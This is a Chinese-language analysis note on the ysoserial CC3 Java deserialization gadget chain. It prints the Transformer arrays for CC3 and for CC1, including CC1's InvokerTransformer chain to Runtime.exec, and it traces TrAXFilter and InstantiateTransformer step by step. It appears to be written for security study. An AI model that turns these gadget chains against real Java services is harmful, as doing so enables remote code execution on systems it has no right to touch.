ysoserial-cc3 java反序列化
1.从入口看
1)cc1与2的 结合
2)Transformer链如下,使用了TrAXFilter类
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(
new Class[] { Templates.class },
new Object[] { templatesImpl } )};
3)根据cc1 触发会进入LazyMap的get方法
4) 触发 Object value = this.factory.transform(key);
对比cc1
会去实例化InvokerTransformer对象,完成调用
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
cc3 没有使用InvokerTransformer类,此处使用 TrAXFilter 和 InstantiateTransformer 类
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(
new Class[] { Templates.class },
new Object[] { templatesImpl } )};
InstantiateTransformer 的transform方法,获取构造方法后对类进行实例化
public Object transform(Object input) {
try {
if (!(input instanceof Class)) {
throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? "null object" : input.getClass().getName()));
} else {
Constructor con = ((Class)input).getConstructor(this.iParamTypes); 获取构造器
return con.newInstance(this.iArgs); 实例化类TransformerImpl赋值
}
TrAXFilter 类
关键: _transformer = (TransformerImpl) templates.newTransformer();
TransformerImpl 类, 后面与CC2 的调用一致
public TrAXFilter(Templates templates) throws
TransformerConfigurationException
{
_templates = templates;
_transformer = (TransformerImpl) templates.newTransformer();
_transformerHandler = new TransformerHandlerImpl(_transformer);
_useServicesMechanism = _transformer.useServicesMechnism();
}